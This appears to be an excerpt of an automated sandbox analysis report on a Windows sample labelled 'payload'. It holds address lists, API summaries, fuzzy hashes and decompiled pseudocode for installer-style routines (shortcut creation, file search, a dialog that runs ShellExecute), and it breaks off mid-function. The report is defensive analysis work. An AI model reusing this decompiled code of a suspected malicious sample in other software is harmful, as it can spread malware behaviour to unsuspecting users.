0x10001a7c
0x10001a81
0x10001a84
0x10001a8c
0x10001a94
0x10001a96
0x10001a99
0x10001aa1
0x10001aa1
0x10001aa6
0x10001aa9
0x00000000
0x00000000
0x10001ab3
0x10001ab5
0x10001aba
0x10001abc
0x10001b2e
0x10001b2e
0x10001b2e
0x10001b32
0x10001b35
0x10001b37
0x10001b59
0x10001b5c
0x10001b5e
0x10001b6d
0x10001b6f
0x10001b75
0x10001b75
0x10001b7b
0x10001b7e
0x10001b7e
0x10001b81
0x10001b81
0x10001b87
0x10001b89
0x10001b8c
0x10001b92
0x10001b95
0x10001b95
0x10001b97
0x10001b9d
0x10001ba0
0x10001bc4
0x10001bc7
0x00000000
0x00000000
0x10001bca
0x10001bcc
0x10001bda
0x10001bdd
0x10001bdf
0x00000000
0x00000000
0x00000000
0x00000000
0x10001be1
0x10001be1
0x10001be1
0x10001be7
0x10001be9
0x00000000
0x00000000
0x10001beb
0x10001bed
0x10001bef
0x10001bf1
0x00000000
0x00000000
0x00000000
0x10001bf1
0x10001bf3
0x10001bf5
0x10001bf7
0x10001bf7
0x10001bfd
0x10001c03
0x10001c05
0x10001c19
0x10001c19
0x10001c1b
0x10001c07
0x10001c0d
0x10001c10
0x10001c10
0x00000000
0x10001ba2
0x10001ba2
0x10001ba2
0x10001ba3
0x10001bab
0x10001baf
0x10001bb5
0x10001bb9
0x10001c21
0x10001c24
0x10001c27
0x10001cb1
0x10001cb5
0x10001a9e
0x00000000
0x10001a9e
0x00000000
0x10001cb5
0x10001ba5
0x10001ba5
0x10001ba6
0x00000000
0x00000000
0x10001ba8
0x10001ba9
0x00000000
0x00000000
0x00000000
0x10001ba9
0x10001ba0
0x10001b3a
0x00000000
0x00000000
0x10001b43
0x10001b46
0x10001b53
0x10001b53
0x10001b48
0x00000000
0x10001b48
0x10001abe
0x10001ac1
0x10001b12
0x10001b15
0x10001b26
0x10001b26
0x10001b29
0x00000000
0x10001b29
0x10001b17
0x10001b1b
0x00000000
0x00000000
0x10001b1d
0x10001b20
0x10001c2f
0x10001c32
0x10001c32
0x10001c34
0x10001f7a
0x10001f7d
0x10001fe0
0x10001ca2
0x10001ca5
0x10001ca8
0x10001cab
0x10001cab
0x10001cad
0x10001cad
0x10001cad
0x10001cae
0x00000000
0x10001cae
0x10001f7f
0x10001f82
0x10001f8e
0x10001f8e
0x10001f91
0x10001f94
0x10001f9f
0x10001f9f
0x10001fa2
0x10001fa5
0x10001fec
0x10001fef
0x10001ff2
0x00000000
0x10001ff2
0x10001fa7
0x10001faa
0x00000000
0x00000000
0x10001fac
0x10001fb3
0x10001fb3
0x10001fb9
0x10001fbc
0x10001fd8
0x10001fbe
0x10001fc7
0x10001fca
0x10001fca
0x00000000
0x10001fbc
0x10001f96
0x00000000
0x10001f96
0x10001f84
0x10001f87
0x00000000
0x00000000
0x10001f89
0x10001f8c
0x00000000
0x00000000
0x00000000
0x10001f8c
0x10001c3a
0x10001c3a
0x10001c3b
0x10001d6a
0x10001d6a
0x10001d6f
0x10001d72
0x00000000
0x00000000
0x10001d7f
0x00000000
0x10001f22
0x10001f25
0x10001f28
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x10001f32
0x10001f32
0x10001f35
0x10001f47
0x10001f4a
0x10001f53
0x00000000
0x10001f53
0x10001f37
0x10001f37
0x10001f39
0x00000000
0x00000000
0x10001f3b
0x10001f3d
0x10001f3f
0x10001f3f
0x10001f3f
0x10001f40
0x10001f42
0x10001f44
0x10001f28
0x10001f29
0x10001f2c
0x10001f2e
0x10001f30
0x00000000
0x00000000
0x00000000
0x10001f30
0x00000000
0x10001dc6
0x00000000
0x00000000
0x10001dd2
0x00000000
0x00000000
0x10001db9
0x10001dbd
0x10001dc1
0x00000000
0x00000000
0x10001ef4
0x10001ef8
0x00000000
0x00000000
0x10001efe
0x10001f06
0x10001f0d
0x10001f15
0x00000000
0x00000000
0x10001e91
0x10001e91
0x00000000
0x00000000
0x10001ddb
0x00000000
0x00000000
0x10001f72
0x00000000
0x00000000
0x10001f62
0x00000000
0x00000000
0x10001f66
0x00000000
0x00000000
0x10001f6e
0x00000000
0x00000000
0x10001eb4
0x00000000
0x00000000
0x10001e99
0x10001e9b
0x00000000
0x00000000
0x10001ebc
0x00000000
0x00000000
0x10001ea1
0x00000000
0x00000000
0x10001ea5
0x00000000
0x00000000
0x10001f6a
0x10001f74
0x10001f74
0x00000000
0x00000000
0x10001ec4
0x10001ec8
0x10001ecd
0x10001ed0
0x10001ed1
0x10001ed4
0x10001eda
0x10001eda
0x00000000
0x00000000
0x10001f5a
0x00000000
0x00000000
0x10001ea9
0x10001eac
0x10001eae
0x00000000
0x00000000
0x10001de2
0x10001de2
0x00000000
0x00000000
0x10001eb8
0x10001ebe
0x10001ebe
0x10001de4
0x10001de4
0x10001de7
0x10001dee
0x10001df1
0x10001df3
0x10001df5
0x10001df6
0x10001dfa
0x10001dfd
0x10001e03
0x10001e09
0x10001e09
0x10001e0b
0x10001e0b
0x10001e0e
0x10001e14
0x10001e16
0x10001e1a
0x10001e1f
0x10001e1f
0x10001e21
0x10001e21
0x10001e24
0x10001e27
0x10001e30
0x10001e33
0x10001e36
0x10001e36
0x10001e38
0x10001e3b
0x10001e41
0x00000000
0x10001e41
0x10001e05
0x10001e07
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d86
0x10001d8c
0x10001d8f
0x10001d91
0x10001d91
0x10001d94
0x10001d98
0x10001da5
0x10001da7
0x10001dad
0x10001dad
0x10001dad
0x00000000
0x00000000
0x10001ee2
0x10001ee6
0x10001eeb
0x10001eee
0x10001e47
0x10001e47
0x10001e49
0x00000000
0x00000000
0x10001e4f
0x10001e4f
0x10001e53
0x10001e5a
0x10001e7e
0x10001e7e
0x10001e82
0x10001e84
0x10001e87
0x10001e87
0x10001e8a
0x10001e8a
0x00000000
0x10001e82
0x10001e5f
0x10001e62
0x10001e62
0x10001e69
0x10001e6b
0x10001e6e
0x10001e75
0x10001e76
0x10001e7c
0x10001e7c
0x00000000
0x10001e7c
0x10001e70
0x10001e73
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001d7f
0x10001c41
0x10001c41
0x10001c42
0x10001d67
0x00000000
0x10001d67
0x10001c48
0x10001c49
0x00000000
0x00000000
0x10001c51
0x10001c51
0x10001c54
0x10001c9f
0x00000000
0x10001c9f
0x10001c56
0x10001c56
0x10001c59
0x10001c83
0x10001c86
0x10001c89
0x10001d59
0x10001d59
0x10001d59
0x10001c8f
0x10001c8f
0x10001c8f
0x10001d5f
0x00000000
0x10001d5f
0x10001c5c
0x10001c5c
0x10001c5d
0x10001c80
0x10001c82
0x10001c82
0x00000000
0x10001c82
0x10001c5f
0x10001c5f
0x10001c62
0x10001c7c
0x00000000
0x10001c7c
0x10001c64
0x10001c64
0x10001c67
0x10001c78
0x00000000
0x10001c78
0x10001c69
0x10001c69
0x10001c6a
0x10001c74
0x00000000
0x10001c74
0x10001c6d
0x10001c6e
0x00000000
0x00000000
0x10001c70
0x00000000
0x10001c70
0x00000000
0x10001b20
0x10001ac3
0x10001ac6
0x10001af5
0x10001af9
0x10001b00
0x10001b07
0x10001b0a
0x10001b0d
0x00000000
0x10001b0d
0x10001ac8
0x10001ac9
0x10001ae4
0x10001aeb
0x10001aee
0x00000000
0x10001aee
0x10001ace
0x00000000
0x10001ad4
0x10001ad4
0x10001adb
0x00000000
0x10001adb
0x10001ace
0x10001cc4
0x10001cc9
0x10001cce
0x10001cd2
0x100020ef
0x100020f5
0x10001ce4
0x10001ce6
0x10001ce7
0x1000201a
0x1000201a
0x1000201d
0x10002020
0x1000203d
0x10002043
0x10002045
0x1000204b
0x10002062
0x10002062
0x10002062
0x1000206f
0x10002075
0x10002078
0x1000207e
0x10002080
0x10002083
0x10002085
0x1000208c
0x10002091
0x10002094
0x10002096
0x1000209b
0x100020ad
0x100020ad
0x1000209b
0x10002094
0x10002083
0x100020b3
0x100020b6
0x100020c0
0x100020c8
0x100020d4
0x100020da
0x100020dd
0x1000200f
0x1000200f
0x00000000
0x1000200f
0x100020e3
0x100020e9
0x100020e9
0x00000000
0x00000000
0x100020eb
0x100020eb
0x100020eb
0x100020eb
0x00000000
0x100020b8
0x100020b8
0x100020be
0x00000000
0x00000000
0x00000000
0x100020be
0x100020b6
0x1000204e
0x10002054
0x10002056
0x1000205c
0x00000000
0x00000000
0x00000000
0x1000205c
0x10002022
0x10002029
0x1000202f
0x10002035
0x00000000
0x10002035
0x10001ced
0x10001cee
0x10001ff9
0x10001ff9
0x10001fff
0x10002002
0x00000000
0x00000000
0x10002009
0x1000200e
0x00000000
0x1000200e
0x10001cf5
0x00000000
0x00000000
0x10001cfb
0x10001cfb
0x10001d04
0x10001d09
0x10001d0f
0x00000000
0x00000000
0x10001d15
0x10001d22
0x10001d28
0x10001d32
0x10001d38
0x10001d40
0x10001d50
0x00000000
0x10001d50

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040205E() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x34) = E00402A3A(0xfffffff0);
				 *(_t111 - 0xc) = E00402A3A(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x4c)) = E00402A3A(2);
				 *((intOrPtr*)(_t111 - 0x40)) = E00402A3A(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x38)) = E00402A3A(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x44) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E004057D8( *(_t111 - 0xc)) == 0) {
					E00402A3A(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x407408, _t87, 1, 0x4073f8, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407418, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical\\Chipyard\\reconfiguration");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
						_t95 =  *((intOrPtr*)(_t111 - 0x40));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x44));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x4c)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x38)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x34), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402067
0x00402071
0x0040207b
0x00402085
0x00402090
0x00402093
0x004020ad
0x004020b0
0x004020b6
0x004020b9
0x004020c3
0x004020c7
0x004020c7
0x004020cc
0x004020dd
0x004020e5
0x004021bb
0x004021bb
0x004021c2
0x004020eb
0x004020eb
0x004020fa
0x004020fe
0x00402101
0x00402107
0x00402115
0x00402118
0x0040211a
0x00402125
0x00402125
0x0040212a
0x0040212c
0x00402133
0x00402133
0x00402136
0x0040213f
0x00402142
0x00402147
0x00402149
0x00402153
0x00402153
0x00402156
0x0040215f
0x00402162
0x0040216b
0x00402171
0x00402178
0x00402191
0x00402193
0x004021a1
0x004021a1
0x00402191
0x004021a4
0x004021aa
0x004021aa
0x004021ad
0x004021b3
0x004021b9
0x004021ce
0x00000000
0x00000000
0x00000000
0x004021b9
0x004021c4
0x004028d2
0x004028de

APIs

CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration, xrefs: 0040211D

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical\Chipyard\reconfiguration
API String ID: 123533781-2371970288
Opcode ID: 72b7c8b7d08c9ab9c84fa976ac8820b50ccab597134c12820353a887da7c1cc5
Instruction ID: 15b8319daa3a69dadbe16bc3493db081a7dc62ee607a685d27ecc12527328b4b
Opcode Fuzzy Hash: 72b7c8b7d08c9ab9c84fa976ac8820b50ccab597134c12820353a887da7c1cc5
Instruction Fuzzy Hash: 785138B1A00208BFCF10DFA4C988A9D7BB5FF48319F20856AF515EB2D1DB799941CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00402688(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A3A(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405C57(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405CF9();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004026a0
0x004026b4
0x004026bf
0x004026c0
0x004027f5
0x004026a2
0x004026a2
0x004026a4
0x004026a6
0x004026a6
0x004028d2
0x004028de

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: cb16f76f613cfeacfe9d7d1606de7c41d9ddcb675c05edb315b0dfd0efe91f96
Instruction ID: a95b2630499809d01a6e7b037cab792d100f7a465f9f887e4e98b5ff960ae470
Opcode Fuzzy Hash: cb16f76f613cfeacfe9d7d1606de7c41d9ddcb675c05edb315b0dfd0efe91f96
Instruction Fuzzy Hash: 79F0A7726082009BE701E7A49949AEE7778DB61314F60057BE241A21C1D7B84985AB3A

Uniqueness

Uniqueness Score: -1.00%

Function 00404027 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 205
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404027(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41ecd4 =  *0x41ecd4 + 1;
								__eflags =  *0x41ecd4;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403F45(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4226a0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423708, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423708, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41ecd4; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x41f4e0 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E00403F00(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004042B1();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x422edc; // 0x6142c1
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x423738;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E00403FF2;
					E00403EDE(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E00403EDE(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00403F00( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E00403F13(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x423710 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41ecd4 = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41ecd4 = 0;
					return 0;
				}
			}

0x00404037
0x00404149
0x0040415c
0x004041b8
0x004041b8
0x004041bc
0x0040428c
0x00404293
0x00404295
0x00404295
0x00404295
0x0040429b
0x0040429b
0x0040429e
0x00000000
0x004042a5
0x004041ca
0x004041cc
0x004041cf
0x004041d6
0x004041d8
0x004041df
0x004041e1
0x004041e4
0x004041e7
0x004041ec
0x004041f2
0x004041f5
0x004041fc
0x0040420a
0x00404222
0x00404235
0x00404245
0x00404247
0x00404247
0x004041fc
0x004041df
0x0040424a
0x00404251
0x00000000
0x00404253
0x00404253
0x0040425a
0x00000000
0x00000000
0x0040425c
0x00404260
0x00404271
0x00404271
0x00404273
0x00404277
0x00404285
0x00404285
0x00000000
0x00404289
0x00404251
0x00404164
0x00404167
0x00000000
0x00000000
0x0040416f
0x00404175
0x00000000
0x00000000
0x00404181
0x00404184
0x00404187
0x00000000
0x00000000
0x004041aa
0x004041aa
0x004041ac
0x004041ae
0x004041b3
0x00000000
0x0040403d
0x0040403d
0x00404040
0x00404045
0x00404047
0x00404056
0x00404056
0x0040405d
0x00404060
0x00404062
0x00404067
0x00404070
0x00404076
0x00404082
0x00404085
0x0040408e
0x00404093
0x00404096
0x0040409b
0x004040b2
0x004040b9
0x004040cc
0x004040cf
0x004040e4
0x004040eb
0x004040f0
0x004040f5
0x004040f5
0x00404104
0x00404113
0x00404125
0x0040412a
0x0040413a
0x0040413c
0x00000000
0x00404142

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040B2
GetDlgItem.USER32(00000000,000003E8), ref: 004040C6
SendMessageA.USER32 ref: 004040E4
GetSysColor.USER32 ref: 004040F5
SendMessageA.USER32 ref: 00404104
SendMessageA.USER32 ref: 00404113
lstrlenA.KERNEL32(?), ref: 00404116
SendMessageA.USER32 ref: 00404125
SendMessageA.USER32 ref: 0040413A
GetDlgItem.USER32(?,0000040A), ref: 0040419C
SendMessageA.USER32 ref: 0040419F
GetDlgItem.USER32(?,000003E8), ref: 004041CA
SendMessageA.USER32 ref: 0040420A
LoadCursorA.USER32 ref: 00404219
SetCursor.USER32(00000000), ref: 00404222
ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404235
LoadCursorA.USER32 ref: 00404242
SetCursor.USER32(00000000), ref: 00404245
SendMessageA.USER32 ref: 00404271
SendMessageA.USER32 ref: 00404285

Strings

Call, xrefs: 004041F5
open, xrefs: 0040422D
N, xrefs: 004041B8

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: Call$N$open
API String ID: 3615053054-2563687911
Opcode ID: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
Instruction ID: f5dd8c80699fee66c1c508087d6ededbe7bbcdfb93c9c5870bdb982cd402330a
Opcode Fuzzy Hash: d6331d360d592cb1fcb1934a6ab791839a151b05b6f3426df7f2f496f579edd7
Instruction Fuzzy Hash: 1261C5B1A40209BFEB109F61DC45F6A7B79FB84741F10807AFB057A2D1C7B8A951CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
